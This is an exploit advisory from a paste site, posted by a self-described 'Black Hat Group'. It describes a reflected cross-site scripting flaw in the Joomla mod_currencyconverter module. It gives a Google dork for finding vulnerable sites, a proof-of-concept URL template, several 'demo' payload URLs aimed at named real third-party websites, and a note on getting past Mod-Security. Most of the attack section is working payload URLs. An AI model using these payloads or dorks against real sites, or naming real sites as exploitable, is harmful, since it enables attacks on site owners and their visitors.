Joomla modules XSS Vulnerability


SUBMITTED BY: Guest

DATE: Feb. 1, 2014, 1:46 a.m.

FORMAT: Text only

SIZE: 2.3 kB

HITS: 740

  1. ###############################################################################
  2. # #
  3. # More exploits: http://adf.ly/5EHaQ ! #
  4. ###############################################################################
  5. # Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
  6. # Date: 2012-02-02 [GMT +7]
  7. # Author: BHG Security Center
  8. # Software Link: http://joomla.org
  9. # Dork: inurl:/includes/convert.php?from=
  10. # Tested on: ubuntu 11.04
  11. # CVE : -
  12. -----------------------------------------------------------------------------------------
  13. Joomla modules (mod_currencyconverter) XSS Vulnerability
  14. -----------------------------------------------------------------------------------------
  15. Author : BHG Security Center
  16. Date : 2012-02-02
  17. Location : Iran
  18. Web : http://Black-Hg.Org
  19. Critical Lvl : Medium
  20. Where : From Remote
  21. My Group : Black Hat Group #BHG
  22. ---------------------------------------------------------------------------
  23. PoC/Exploit:
  24. ~~~~~~~~~~
  25. ------------- ( Cross Site Scripting ) ~
  26. ~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
  27. ------------- ( Demo Vulnerability ) ~
  28. Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
  29. Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
  30. Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
  31. Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
  32. Note: URL encoded GET input aonvert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security]
  33. Timeline:
  34. ~~~~~~~~~
  35. - 29 - 01 - 2012 bug found.
  36. - 01 - 02 - 2012 vendor contacted, but no response.
  37. - 02 - 02 - 2012 Advisories release.
  38. ---------------------------------------------------------------------------

comments powered by Disqus